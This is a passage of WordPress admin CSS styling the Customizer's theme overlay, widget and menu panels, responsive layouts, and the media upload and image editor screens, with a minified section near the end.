background: rgba(240, 240, 241, 0.75); position: fixed; z-index: 110; } .wp-customizer .theme-overlay .star-rating { float: left; margin-right: 8px; } .wp-customizer .theme-rating .num-ratings { line-height: 20px; } .wp-customizer .theme-overlay .theme-wrap { left: 90px; right: 90px; top: 45px; bottom: 45px; z-index: 120; } .wp-customizer .theme-overlay .theme-actions { text-align: right; /* Because there're only one or two actions, match the UI pattern of media modals and right-align the action. */ padding: 10px 25px 5px; background: #f0f0f1; border-top: 1px solid #dcdcde; } .wp-customizer .theme-overlay .theme-actions .theme-install.preview { margin-left: 8px; } .modal-open .in-themes-panel #customize-controls .wp-full-overlay-sidebar-content { overflow: visible; /* Prevent the top-level Customizer controls from becoming visible when elements on the right of the details modal are focused. */ } .wp-customizer .theme-header { background: #f0f0f1; } .wp-customizer .theme-overlay .theme-header button, .wp-customizer .theme-overlay .theme-header .close:before { color: #3c434a; } .wp-customizer .theme-overlay .theme-header .close:focus, .wp-customizer .theme-overlay .theme-header .close:hover, .wp-customizer .theme-overlay .theme-header .right:focus, .wp-customizer .theme-overlay .theme-header .right:hover, .wp-customizer .theme-overlay .theme-header .left:focus, .wp-customizer .theme-overlay .theme-header .left:hover { background: #fff; } .wp-customizer .theme-overlay .theme-header .close:focus:before, .wp-customizer .theme-overlay .theme-header .close:hover:before { color: var(--wp-admin-theme-color); } .wp-customizer .theme-overlay .theme-header button.disabled, .wp-customizer .theme-overlay .theme-header button.disabled:hover, .wp-customizer .theme-overlay .theme-header button.disabled:focus { border-bottom: none; background: transparent; color: #c3c4c7; } /* Small Screens */ @media (max-width: 850px), (max-height: 472px) { .wp-customizer .theme-overlay .theme-wrap { left: 0; right: 0; top: 0; bottom: 0; } .wp-customizer .theme-browser .themes { padding-right: 25px; } } /* Handle cheaters. */ body.cheatin { font-size: medium; height: auto; background: #fff; border: 1px solid #c3c4c7; margin: 50px auto 2em; padding: 1em 2em; max-width: 700px; min-width: 0; box-shadow: 0 1px 1px rgba(0, 0, 0, 0.04); } body.cheatin h1 { border-bottom: 1px solid #dcdcde; clear: both; color: #50575e; font-size: 24px; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif; margin: 30px 0 0; padding: 0 0 7px; } body.cheatin p { font-size: 14px; line-height: 1.5; margin: 25px 0 20px; } /** * Widgets and Menus common styles */ /* higher specificity than .wp-core-ui .button */ #customize-theme-controls .add-new-widget, #customize-theme-controls .add-new-menu-item { cursor: pointer; float: right; margin: 0 0 0 10px; transition: all 0.2s; -webkit-user-select: none; user-select: none; outline: none; } .reordering .add-new-widget, .reordering .add-new-menu-item { opacity: 0.2; pointer-events: none; cursor: not-allowed; /* doesn't work in conjunction with pointer-events */ } .add-new-widget:before, .add-new-menu-item:before, #available-menu-items .new-content-item .add-content:before { content: "\f132"; content: "\f132" / ''; display: inline-block; position: relative; left: -2px; top: 0; font: normal 20px/1 dashicons; vertical-align: middle; transition: all 0.2s; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } /* Reordering */ .reorder-toggle { float: right; padding: 5px 8px; text-decoration: none; cursor: pointer; outline: none; } .reorder, .reordering .reorder-done { display: block; padding: 5px 8px; } .reorder-done, .reordering .reorder { display: none; } .widget-reorder-nav span, .menu-item-reorder-nav button { position: relative; overflow: hidden; float: left; display: block; width: 33px; /* was 42px for mobile */ height: 43px; color: #8c8f94; text-indent: -9999px; cursor: pointer; outline: none; } .menu-item-reorder-nav button { width: 30px; height: 40px; background: transparent; border: none; box-shadow: none; } .widget-reorder-nav span:before, .menu-item-reorder-nav button:before { display: inline-block; position: absolute; top: 0; right: 0; width: 100%; height: 100%; font: normal 20px/43px dashicons; text-align: center; text-indent: 0; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .widget-reorder-nav span:hover, .widget-reorder-nav span:focus, .menu-item-reorder-nav button:hover, .menu-item-reorder-nav button:focus { color: #1d2327; background: #f0f0f1; } .move-widget-down:before, .menus-move-down:before { content: "\f347"; content: "\f347" / ''; } .move-widget-up:before, .menus-move-up:before { content: "\f343"; content: "\f343" / ''; } #customize-theme-controls .first-widget .move-widget-up, #customize-theme-controls .last-widget .move-widget-down, .move-up-disabled .menus-move-up, .move-down-disabled .menus-move-down, .move-right-disabled .menus-move-right, .move-left-disabled .menus-move-left { color: #dcdcde; background-color: #fff; cursor: default; pointer-events: none; } /** * New widget and Add-menu-items modes and panels */ .wp-full-overlay-main { right: auto; /* this overrides a right: 0; which causes the preview to resize, I'd rather have it go off screen at the normal size. */ width: 100%; } body.adding-widget .add-new-widget, body.adding-widget .add-new-widget:hover, .adding-menu-items .add-new-menu-item, .adding-menu-items .add-new-menu-item:hover, .add-menu-toggle.open, .add-menu-toggle.open:hover { background: #f0f0f1; border-color: #8c8f94; color: #2c3338; box-shadow: inset 0 2px 5px -3px rgba(0, 0, 0, 0.5); } body.adding-widget .add-new-widget:before, .adding-menu-items .add-new-menu-item:before, #accordion-section-add_menu .add-new-menu-item.open:before { transform: rotate(45deg); } #available-widgets, #available-menu-items { position: absolute; top: 0; bottom: 0; left: -301px; visibility: hidden; overflow-x: hidden; overflow-y: auto; width: 300px; margin: 0; z-index: 4; background: #f0f0f1; transition: left .18s; border-right: 1px solid #dcdcde; } #available-widgets .accordion-section-title, #available-menu-items .accordion-section-title { z-index: 2; } #available-widgets .customize-section-title, #available-menu-items .customize-section-title { border: 0; clip-path: inset(50%); height: 1px; margin: -1px; overflow: hidden; padding: 0; position: absolute; width: 1px; /* Many screen reader and browser combinations announce broken words as they would appear visually. */ word-wrap: normal !important; word-break: normal !important; } #available-widgets .customize-section-title button, #available-menu-items .customize-section-title button { display: none; } #available-widgets-list { top: 82px; position: absolute; overflow: auto; bottom: 0; width: 100%; border-top: 1px solid #dcdcde; } .no-widgets-found #available-widgets-list { border-top: none; } #available-widgets-filter { position: fixed; top: 0; z-index: 1; width: 300px; background: #f0f0f1; } /* search field container */ #available-widgets-filter, #available-menu-items-search .accordion-section-title { padding: 13px 15px; box-sizing: border-box; } #available-widgets-filter input, #available-menu-items-search input { width: 100%; min-height: 40px; margin: 1px 0; padding: 0 30px; } #available-widgets-filter input::-ms-clear, #available-menu-items-search input::-ms-clear { display: none; /* remove the "x" in IE, which conflicts with the "x" icon on button.clear-results */ } #available-menu-items-search .search-icon, #available-widgets-filter .search-icon { display: block; position: absolute; bottom: 19px; /* 13 container padding +1 input margin +1 input border +4 centering in 40px input */ left: 16px; width: 30px; height: 30px; line-height: 2.1; text-align: center; color: #646970; } #available-widgets-filter .clear-results, #available-menu-items-search .accordion-section-title .clear-results { position: absolute; top: 40px; /* 13 container padding +1 input margin +1 input border +4 centering in 40px input */ right: 16px; width: 30px; height: 30px; padding: 0; border: 0; cursor: pointer; background: none; color: #d63638; text-decoration: none; outline: 0; } #available-widgets-filter .clear-results, #available-menu-items-search .clear-results, #available-menu-items-search.loading .clear-results.is-visible { display: none; } #available-widgets-filter .clear-results.is-visible, #available-menu-items-search .clear-results.is-visible { display: block; } #available-widgets-filter .clear-results:before, #available-menu-items-search .clear-results:before { content: "\f335"; content: "\f335" / ''; font: normal 20px/1 dashicons; vertical-align: middle; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } #available-widgets-filter .clear-results:hover, #available-widgets-filter .clear-results:focus, #available-menu-items-search .clear-results:hover, #available-menu-items-search .clear-results:focus { color: #d63638; } #available-widgets-filter .clear-results:focus, #available-menu-items-search .clear-results:focus { border-radius: 2px; box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } #available-menu-items-search .search-icon:after, #available-widgets-filter .search-icon:after, .themes-filter-bar .search-icon:after { content: "\f179"; font: normal 20px/1 dashicons; vertical-align: middle; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .themes-filter-bar .search-icon { position: absolute; top: 2px; left: 2px; z-index: 1; color: #646970; height: 30px; width: 30px; line-height: 2; text-align: center; } .no-widgets-found-message { display: none; margin: 0; padding: 0 15px; line-height: inherit; } .no-widgets-found .no-widgets-found-message { display: block; } #available-widgets .widget-top, #available-widgets .widget-top:hover, #available-menu-items .item-top, #available-menu-items .item-top:hover { border: none; background: transparent; box-shadow: none; } #available-widgets .widget-tpl, #available-menu-items .item-tpl { position: relative; padding: 15px 15px 15px 60px; background: #fff; border-bottom: 1px solid #dcdcde; border-left: 4px solid #fff; transition: .15s color ease-in-out, .15s background-color ease-in-out, .15s border-color ease-in-out; cursor: pointer; display: none; } #available-widgets .widget, #available-menu-items .item { position: static; } /* Responsive */ .customize-controls-preview-toggle { display: none; } @media only screen and (max-width: 782px) { .wp-customizer .theme:not(.active):hover .theme-actions, .wp-customizer .theme:not(.active):focus .theme-actions { display: block; } .wp-customizer .theme-browser .theme.active .theme-name span { display: inline; } .customize-control-header button.random .dice { margin-top: 0; } .customize-control-radio .customize-inside-control-row, .customize-control-checkbox .customize-inside-control-row, .customize-control-nav_menu_auto_add .customize-inside-control-row { margin-left: 32px; } .customize-control-radio input, .customize-control-checkbox input, .customize-control-nav_menu_auto_add input { margin-left: -32px; } .customize-control input[type="radio"] + label + br, .customize-control input[type="checkbox"] + label + br { line-height: 2.5; /* For widgets checkboxes */ } .customize-control .date-time-fields select { height: 39px; } .date-time-fields .date-input.month { width: 79px; } .date-time-fields .date-input.day, .date-time-fields .date-input.hour, .date-time-fields .date-input.minute { width: 55px; } .date-time-fields .date-input.year { width: 80px; } #customize-control-changeset_preview_link a { bottom: 16px; } .media-widget-control .media-widget-buttons .button.edit-media, .media-widget-control .media-widget-buttons .button.change-media, .media-widget-control .media-widget-buttons .button.select-media { margin-top: 12px; } .customize-preview-header.themes-filter-bar .search-icon { top: 6px; } } @media screen and (max-width: 1200px) { .outer-section-open .wp-full-overlay.expanded.preview-mobile .wp-full-overlay-main, .adding-menu-items .wp-full-overlay.expanded.preview-mobile .wp-full-overlay-main, .adding-widget .wp-full-overlay.expanded.preview-mobile .wp-full-overlay-main { left: 67%; } } @media screen and (max-width: 640px) { /* when the sidebar is collapsed and switching to responsive view, bring it back see ticket #35220 */ .wp-full-overlay.collapsed #customize-controls { margin-left: 0; } .wp-full-overlay-sidebar .wp-full-overlay-sidebar-content { bottom: 0; } .customize-controls-preview-toggle { display: block; position: absolute; top: 0; left: 48px; line-height: 2.6; font-size: 14px; padding: 0 12px 4px; margin: 0; height: 45px; background: #f0f0f1; border: 0; border-right: 1px solid #dcdcde; border-top: 4px solid #f0f0f1; color: #50575e; cursor: pointer; transition: color .1s ease-in-out, background .1s ease-in-out; } #customize-footer-actions, /*#customize-preview,*/ .customize-controls-preview-toggle .controls, .preview-only .wp-full-overlay-sidebar-content, .preview-only .customize-controls-preview-toggle .preview { display: none; } .preview-only #customize-save-button-wrapper { margin-top: -46px; } .customize-controls-preview-toggle .preview:before, .customize-controls-preview-toggle .controls:before { font: normal 20px/1 dashicons; content: "\f177"; content: "\f177" / ''; position: relative; top: 4px; margin-right: 6px; } .customize-controls-preview-toggle .controls:before { content: "\f540"; content: "\f540" / ''; } .preview-only #customize-controls { height: 45px; } .preview-only #customize-preview, .preview-only .customize-controls-preview-toggle .controls { display: block; } .wp-core-ui.wp-customizer .button { padding: 0 14px; line-height: 2.14285714; /* 30px */ font-size: 14px; vertical-align: middle; } .customize-control .attachment-media-view .upload-button { text-align: center; } #customize-control-changeset_status .customize-inside-control-row { padding-top: 15px; } body.adding-widget div#available-widgets, body.adding-menu-items div#available-menu-items, body.outer-section-open div#customize-sidebar-outer-content { width: 100%; } #available-widgets .customize-section-title, #available-menu-items .customize-section-title { border: 0; clip-path: none; height: inherit; margin: 0; overflow: hidden; padding: 0; width: auto; position: static; } #available-widgets .customize-section-title button, #available-menu-items .customize-section-title button { display: block; } #available-widgets .customize-section-back, #available-menu-items .customize-section-back { height: 69px; } #available-widgets .customize-section-title h3, #available-menu-items .customize-section-title h3 { font-size: 20px; font-weight: 200; padding: 9px 10px 12px 14px; margin: 0; line-height: 24px; color: #50575e; display: block; overflow: hidden; white-space: nowrap; text-overflow: ellipsis; } #available-widgets .customize-section-title .customize-action, #available-menu-items .customize-section-title .customize-action { font-size: 13px; display: block; font-weight: 400; overflow: hidden; white-space: nowrap; text-overflow: ellipsis; } #available-widgets-filter { position: relative; width: 100%; height: auto; } #available-widgets-list { top: 152px; } #available-menu-items-search .clear-results { top: 40px; right: 16px; } .reorder, .reordering .reorder-done { padding: 8px; } } @media screen and (max-width: 600px) { .wp-full-overlay.expanded { margin-left: 0; } body.adding-widget div#available-widgets, body.adding-menu-items div#available-menu-items, body.outer-section-open div#customize-sidebar-outer-content { top: 46px; z-index: 10; } body.wp-customizer .wp-full-overlay.expanded #customize-sidebar-outer-content { left: -100%; } body.wp-customizer.outer-section-open .wp-full-overlay.expanded #customize-sidebar-outer-content { left: 0; } } /*! This file is auto-generated */ .media-item .describe{border-collapse:collapse;width:100%;border-top:1px solid #dcdcde;clear:both;cursor:default}.media-item.media-blank .describe{border:0}.media-item .describe th{vertical-align:top;text-align:left;padding:5px 10px 10px;width:140px}.media-item .describe .align th{padding-top:0}.media-item .media-item-info tr{background-color:transparent}.media-item .describe td{padding:0 8px 8px 0;vertical-align:top}.media-item thead.media-item-info td{padding:4px 10px 0}.media-item .media-item-info .A1B1{padding:0 0 0 10px}.media-item td.savesend{padding-bottom:15px}.media-item .thumbnail{max-height:128px;max-width:128px}.media-list-subtitle{display:block}.media-list-title{display:block}#wpbody-content #async-upload-wrap a{display:none}.media-upload-form{margin-top:20px}.media-upload-form td label{margin-right:6px;margin-left:2px}.media-upload-form .align .field label{display:inline;padding:0 0 0 23px;margin:0 1em 0 3px;font-weight:600}.media-upload-form tr.image-size label{margin:0 0 0 5px;font-weight:600}.media-upload-form th.label label{font-weight:600;margin:.5em;font-size:13px}.media-upload-form th.label label span{padding:0 5px}.media-item .describe input[type=text],.media-item .describe textarea{width:460px}.media-item .describe p.help{margin:0;padding:0 0 0 5px}.describe-toggle-off,.describe-toggle-on{display:block;line-height:2.76923076;float:right;margin-right:10px}.media-item .attachment-tools{display:flex;align-items:center}.media-item .edit-attachment{padding:14px 0;display:block;margin-right:10px}.media-item .edit-attachment.copy-to-clipboard-container{display:flex;margin-top:0}.media-item-copy-container .success{line-height:0}.media-item button .copy-attachment-url{margin-top:14px}.media-item .copy-to-clipboard-container{margin-top:7px}.media-item .describe-toggle-off,.media-item.open .describe-toggle-on{display:none}.media-item.open .describe-toggle-off{display:block}.media-upload-form .media-item{min-height:70px;margin-bottom:1px;position:relative;width:100%;background:#fff}.media-upload-form .media-item,.media-upload-form .media-item .error{box-shadow:0 1px 0 #dcdcde}#media-items:empty{border:0 none}.media-item .filename{padding:14px 2px;overflow:hidden;margin-left:4px}.media-item .pinkynail{float:left;margin:14px;max-height:70px;max-width:70px}.media-item .startclosed,.media-item .startopen{display:none}.media-item .progress{display:inline-block;height:22px;margin:0 6px 7px;width:200px;line-height:2em;padding:0;overflow:hidden;border-radius:22px;background:#dcdcde;box-shadow:inset 0 1px 2px rgba(0,0,0,.1)}.media-item .bar{z-index:9;width:0;height:100%;margin-top:-22px;border-radius:22px;background-color:#2271b1;box-shadow:inset 0 0 2px rgba(0,0,0,.3)}.media-item .progress .percent{z-index:10;position:relative;width:200px;padding:0;color:#fff;text-align:center;line-height:22px;font-weight:400;text-shadow:0 1px 2px rgba(0,0,0,.2)}.upload-php .fixed .column-parent{width:15%}.js .html-uploader #plupload-upload-ui{display:none}.js .html-uploader #html-upload-ui{display:block}#html-upload-ui #async-upload{font-size:1em}.media-upload-form .media-item .error,.media-upload-form .media-item.error{width:auto;margin:0 0 1px}.media-upload-form .media-item .error{padding:10px 0 10px 14px;min-height:50px}.media-item .error-div button.dismiss{float:right;margin:0 10px 0 15px}.find-box{background-color:#fff;box-shadow:0 3px 6px rgba(0,0,0,.3);width:600px;overflow:hidden;margin-left:-300px;position:fixed;top:30px;bottom:30px;left:50%;z-index:100105}.find-box-head{background:#fff;border-bottom:1px solid #dcdcde;height:36px;font-size:18px;font-weight:600;line-height:2;padding:0 36px 0 16px;position:absolute;top:0;left:0;right:0}.find-box-inside{overflow:auto;padding:16px;background-color:#fff;position:absolute;top:37px;bottom:45px;overflow-y:scroll;width:100%;box-sizing:border-box}.find-box-search{padding-bottom:16px}.find-box-search .spinner{float:none;left:105px;position:absolute}#find-posts-response,.find-box-search{position:relative}#find-posts-input,#find-posts-search{float:left}#find-posts-input{width:140px;height:28px;margin:0 4px 0 0}.widefat .found-radio{padding-right:0;width:16px}#find-posts-close{width:36px;height:36px;border:none;padding:0;position:absolute;top:0;right:0;cursor:pointer;text-align:center;background:0 0;color:#646970}#find-posts-close:focus,#find-posts-close:hover{color:var(--wp-admin-theme-color-darker-20,#183ad6)}#find-posts-close:focus{box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color,#3858e9);outline:2px solid transparent;outline-offset:-2px}#find-posts-close:before{font:normal 20px/36px dashicons;vertical-align:top;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;content:"\f158";content:"\f158"/''}.find-box-buttons{padding:8px 16px;background:#fff;border-top:1px solid #dcdcde;position:absolute;bottom:0;left:0;right:0}@media screen and (max-width:782px){.find-box-inside{bottom:57px}#delete_all{margin-bottom:0}}@media screen and (max-width:660px){.find-box{top:0;bottom:0;left:0;right:0;margin:0;width:100%}}.ui-find-overlay{position:fixed;top:0;left:0;right:0;bottom:0;background:#000;opacity:.7;z-index:100100}.drag-drop #drag-drop-area{border:4px dashed #c3c4c7;height:200px}.drag-drop .drag-drop-inside{margin:60px auto 0;width:250px}.drag-drop-inside p{font-size:14px;margin:5px 0;display:none}.drag-drop .drag-drop-inside p{text-align:center}.drag-drop-inside p.drag-drop-info{font-size:20px}.drag-drop .drag-drop-inside p,.drag-drop-inside p.drag-drop-buttons{display:block}.drag-drop.drag-over #drag-drop-area{border-color:#9ec2e6}#plupload-upload-ui{position:relative}.post-type-attachment .wp-filter select{margin:0 6px 0 0}.media-frame.mode-grid,.media-frame.mode-grid .attachments-browser.has-load-more .attachments-wrapper,.media-frame.mode-grid .attachments-browser:not(.has-load-more) .attachments,.media-frame.mode-grid .media-frame-content,.media-frame.mode-grid .uploader-inline-content{position:static}.media-frame.mode-grid .media-frame-menu,.media-frame.mode-grid .media-frame-router,.media-frame.mode-grid .media-frame-title{display:none}.media-frame.mode-grid .media-frame-content{background-color:transparent;border:none}.upload-php .mode-grid .media-sidebar{position:relative;width:auto;margin-top:12px;padding:0 16px;border-left:4px solid #d63638;box-shadow:0 1px 1px 0 rgba(0,0,0,.1);background-color:#fff}.upload-php .mode-grid .hide-sidebar .media-sidebar{display:none}.upload-php .mode-grid .media-sidebar .media-uploader-status{border-bottom:none;padding-bottom:0;max-width:100%}.upload-php .mode-grid .media-sidebar .upload-error{margin:12px 0;padding:4px 0 0;border:none;box-shadow:none;background:0 0}.upload-php .mode-grid .media-sidebar .media-uploader-status.errors h2{display:none}.media-frame.mode-grid .uploader-inline{position:relative;top:auto;right:auto;left:auto;bottom:auto;padding-top:0;margin-top:20px;border:4px dashed #c3c4c7}.media-frame.mode-select .attachments-browser.fixed:not(.has-load-more) .attachments,.media-frame.mode-select .attachments-browser.has-load-more.fixed .attachments-wrapper{position:relative;top:94px;padding-bottom:94px}.media-frame.mode-grid .attachment.details:focus,.media-frame.mode-grid .attachment:focus,.media-frame.mode-grid .selected.attachment:focus{box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color,#3858e9);outline:2px solid transparent;outline-offset:-6px}.media-frame.mode-grid .selected.attachment{box-shadow:inset 0 0 0 5px #f0f0f1,inset 0 0 0 7px #c3c4c7}.media-frame.mode-grid .attachment.details{box-shadow:inset 0 0 0 3px #f0f0f1,inset 0 0 0 7px var(--wp-admin-theme-color,#3858e9)}.media-frame.mode-grid.mode-select .attachment .thumbnail{opacity:.65}.media-frame.mode-select .attachment.selected .thumbnail{opacity:1}.media-frame.mode-grid .media-toolbar{margin-bottom:15px;height:auto}.media-frame.mode-grid .media-toolbar label:not(.media-search-input-label){border:0;clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;word-wrap:normal!important;word-break:normal!important}.media-frame.mode-grid .media-toolbar select{margin:0 10px 0 0;min-height:32px;line-height:2.14285714;padding:0 24px 0 8px}.media-frame.mode-grid .media-toolbar input[type=search]{min-height:32px;padding:0 8px}.media-frame.mode-grid .media-toolbar-secondary{display:flex;flex-wrap:wrap;align-items:center;gap:8px}.media-frame.mode-grid.mode-edit .media-toolbar-secondary>.select-mode-toggle-button{margin:0 8px 0 0;height:100%}.media-frame.mode-grid .attachments-browser .bulk-select{display:inline-block;margin:0 10px 0 0}.media-frame.mode-grid .search{margin-top:0}.media-frame-content .media-search-input-label{vertical-align:baseline}.attachments-browser .media-toolbar-secondary>.media-button{margin-right:10px}.media-frame.mode-select .attachments-browser.fixed .media-toolbar{position:fixed;top:32px;left:auto;right:20px;margin-top:0}.media-frame.mode-grid .attachments-browser{padding:0}.media-frame.mode-grid .attachments-browser .attachments{padding:2px}.media-frame.mode-grid .attachments-browser .no-media{color:#646970;font-size:18px;font-style:normal;margin:0;padding:100px 0 0;text-align:center}.edit-attachment-frame{display:block;height:100%;width:100%}.edit-attachment-frame .edit-media-header{overflow:hidden}.upload-php .media-modal-close .media-modal-icon:before{content:"\f335";content:"\f335"/'';font-size:22px}.edit-attachment-frame .edit-media-header .left,.edit-attachment-frame .edit-media-header .right,.upload-php .media-modal-close{cursor:pointer;color:#787c82;background-color:transparent;height:50px;width:50px;padding:0;position:absolute;text-align:center;border:0;border-left:1px solid #dcdcde;transition:color .1s ease-in-out,background .1s ease-in-out}.upload-php .media-modal-close{top:0;right:0}.edit-attachment-frame .edit-media-header .left{right:102px}.edit-attachment-frame .edit-media-header .right{right:51px}.edit-attachment-frame .media-frame-title{left:0;right:150px}.edit-attachment-frame .edit-media-header .left:before,.edit-attachment-frame .edit-media-header .right:before{font:normal 20px/50px dashicons!important;display:inline;font-weight:300}.edit-attachment-frame .edit-media-header .left:focus,.edit-attachment-frame .edit-media-header .left:hover,.edit-attachment-frame .edit-media-header .right:focus,.edit-attachment-frame .edit-media-header .right:hover,.upload-php .media-modal-close:focus,.upload-php .media-modal-close:hover{background:#dcdcde;border-color:#c3c4c7;color:#000;outline:0;box-shadow:none}.edit-attachment-frame .edit-media-header .left:focus,.edit-attachment-frame .edit-media-header .right:focus,.upload-php .media-modal-close:focus{outline:2px solid transparent;outline-offset:-2px}.upload-php .media-modal-close:focus .media-modal-icon:before,.upload-php .media-modal-close:hover .media-modal-icon:before{color:#000}.edit-attachment-frame .edit-media-header .left:before{content:"\f341";content:"\f341"/''}.edit-attachment-frame .edit-media-header .right:before{content:"\f345";content:"\f345"/''}.edit-attachment-frame .edit-media-header [disabled],.edit-attachment-frame .edit-media-header [disabled]:hover{color:#c3c4c7;background:inherit;cursor:default}.edit-attachment-frame .media-frame-content,.edit-attachment-frame .media-frame-router{left:0}.edit-attachment-frame .media-frame-content{border-bottom:none;bottom:0;top:50px}.edit-attachment-frame .attachment-details{position:absolute;overflow:auto;top:0;bottom:0;right:0;left:0;box-shadow:inset 0 4px 4px -4px rgba(0,0,0,.1)}.edit-attachment-frame .attachment-media-view{float:left;width:65%;height:100%}.edit-attachment-frame .attachment-media-view .thumbnail{box-sizing:border-box;padding:16px;height:100%}.edit-attachment-frame .attachment-media-view .details-image{display:block;margin:0 auto 16px;max-width:100%;max-height:90%;max-height:calc(100% - 56px);background-image:linear-gradient(45deg,#c3c4c7 25%,transparent 25%,transparent 75%,#c3c4c7 75%,#c3c4c7),linear-gradient(45deg,#c3c4c7 25%,transparent 25%,transparent 75%,#c3c4c7 75%,#c3c4c7);background-position:0 0,10px 10px;background-size:20px 20px}.edit-attachment-frame .attachment-media-view .details-image.icon{background:0 0}.edit-attachment-frame .attachment-media-view .attachment-actions{text-align:center}.edit-attachment-frame .wp-media-wrapper{margin-bottom:12px}.edit-attachment-frame input,.edit-attachment-frame textarea{padding:4px 8px;line-height:1.42857143}.edit-attachment-frame .attachment-info{overflow:auto;box-sizing:border-box;margin-bottom:0;padding:12px 16px 0;width:35%;height:100%;box-shadow:inset 0 4px 4px -4px rgba(0,0,0,.1);border-bottom:0;border-left:1px solid #dcdcde;background:#f6f7f7}.edit-attachment-frame .attachment-info .details,.edit-attachment-frame .attachment-info .settings{position:relative;overflow:hidden;float:none;margin-bottom:15px;padding-bottom:15px;border-bottom:1px solid #dcdcde}.edit-attachment-frame .attachment-info .filename{font-weight:400;color:#646970}.edit-attachment-frame .attachment-info .thumbnail{margin-bottom:12px}.attachment-info .actions{margin-bottom:16px}.attachment-info .actions a{display:inline;text-decoration:none}.copy-to-clipboard-container{display:flex;align-items:center;margin-top:8px;clear:both}.copy-to-clipboard-container .copy-attachment-url{white-space:normal}.copy-to-clipboard-container .success{color:#007017;margin-left:8px}.wp_attachment_details .attachment-alt-text{margin-bottom:5px}.wp_attachment_details #attachment_alt{max-width:500px;height:3.28571428em}.wp_attachment_details .attachment-alt-text-description{margin-top:5px}.wp_attachment_details label[for=content]{font-size:13px;line-height:1.5;margin:1em 0}.wp_attachment_details #attachment_caption{height:4em}.describe .image-editor{vertical-align:top}.imgedit-wrap{position:relative;padding-top:10px}.image-editor fieldset,.image-editor p{margin:8px 0}.image-editor legend{margin-bottom:5px}.describe .imgedit-wrap .image-editor{padding:0 5px}.wp_attachment_holder div.updated{margin-top:0}.wp_attachment_holder .imgedit-wrap>div{height:auto}.imgedit-panel-content{display:flex;flex-wrap:wrap;gap:20px;margin-bottom:20px}.imgedit-settings{max-width:240px}.imgedit-group-controls>*{display:none}.imgedit-panel-active .imgedit-group-controls>*{display:block}.imgedit-panel-active .imgedit-group-controls>.imgedit-crop-apply{display:flex}.imgedit-crop-apply{gap:4px;flex-wrap:wrap}.wp_attachment_holder .imgedit-wrap .image-editor{float:right;width:250px}.image-editor input{margin-top:0;vertical-align:middle}.imgedit-wait{position:absolute;top:0;bottom:0;width:100%;background:#fff;opacity:.7;display:none}.imgedit-wait:before{content:"";display:block;width:20px;height:20px;position:absolute;left:50%;top:50%;margin:-10px 0 0 -10px;background:transparent url(../images/spinner.gif) no-repeat center;background-size:20px 20px;transform:translateZ(0)}.no-float{float:none}.image-editor .disabled,.media-disabled{color:#a7aaad}.A1B1{overflow:hidden}.A1B1 .button,.wp_attachment_image .button{float:left}.no-js .wp_attachment_image .button{display:none}.A1B1 .spinner,.wp_attachment_image .spinner{float:left}.imgedit-menu .note-no-rotate{clear:both;margin:0;padding:1em 0 0}.imgedit-menu .button:after,.imgedit-menu .button:before{font:normal 16px/1 dashicons;margin-right:8px;vertical-align:middle;position:relative;top:-2px;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.imgedit-menu .imgedit-rotate.button:after{content:'\f140';margin-left:2px;margin-right:0}.imgedit-menu .imgedit-rotate.button[aria-expanded=true]:after{content:'\f142'}.imgedit-menu .button.disabled{color:#a7aaad;border-color:#dcdcde;background:#f6f7f7;box-shadow:none;text-shadow:0 1px 0 #fff;cursor:default;transform:none}.imgedit-crop:before{content:"\f165";content:"\f165"/''}.imgedit-scale:before{content:"\f211";content:"\f211"/''}.imgedit-rotate:before{content:"\f167";content:"\f167"/''}.imgedit-undo:before{content:"\f171";content:"\f171"/''}.imgedit-redo:before{content:"\f172";content:"\f172"/''}.imgedit-crop-wrap{position:relative}.imgedit-crop-wrap img{background-image:linear-gradient(45deg,#c3c4c7 25%,transparent 25%,transparent 75%,#c3c4c7 75%,#c3c4c7),linear-gradient(45deg,#c3c4c7 25%,transparent 25%,transparent 75%,#c3c4c7 75%,#c3c4c7);background-position:0 0,10px 10px;background-size:20px 20px}.imgedit-crop-wrap{padding:20px;background-image:linear-gradient(45deg,#c3c4c7 25%,transparent 25%,transparent 75%,#c3c4c7 75%,#c3c4c7),linear-gradient(45deg,#c3c4c7 25%,transparent 25%,transparent 75%,#c3c4c7 75%,#c3c4c7);background-position:0 0,10px 10px;background-size:20px 20px}.imgedit-crop{margin:0 8px 0 0}.imgedit-rotate{margin:0 8px 0 3px}.imgedit-undo{margin:0 3px}.imgedit-redo{margin:0 8px 0 3px}.imgedit-thumbnail-preview-group{display:flex;flex-wrap:wrap;column-gap:10px}.imgedit-thumbnail-preview{margin:10px 8px 0 0}.imgedit-thumbnail-preview-caption{display:block}#poststuff .imgedit-group-top h2{display:inline-block;margin:0;padding:0;font-size:14px;line-height:1.4}#poststuff .imgedit-group-top .button-link{text-decoration:none;color:#1d2327}.imgedit-applyto .imgedit-label{display:block;padding:.5em 0 0}.imgedit-help,.imgedit-popup-menu{display:none;padding-bottom:8px}.imgedit-panel-tools>.imgedit-menu{display:flex;column-gap:4px;align-items:flex-start;flex-wrap:wrap}.imgedit-popup-menu{width:calc(100% - 20px);position:absolute;background:#fff;padding:10px;box-shadow:0 3px 6px rgba(0,0,0,.3)}.image-editor .imgedit-menu .imgedit-popup-menu button{display:block;margin:2px 0;width:100%;white-space:break-spaces;line-height:1.5;padding-top:3px;padding-bottom:2px}.imgedit-rotate-menu-container{position:relative}.imgedit-help.imgedit-restore{padding-bottom:0}.image-editor .imgedit-settings .imgedit-help-toggle,.image-editor .imgedit-settings .imgedit-help-toggle:active,.image-editor .imgedit-settings .imgedit-help-toggle:hover{border:1px solid transparent;margin:-1px 0 0 -1px;padding:0;background:0 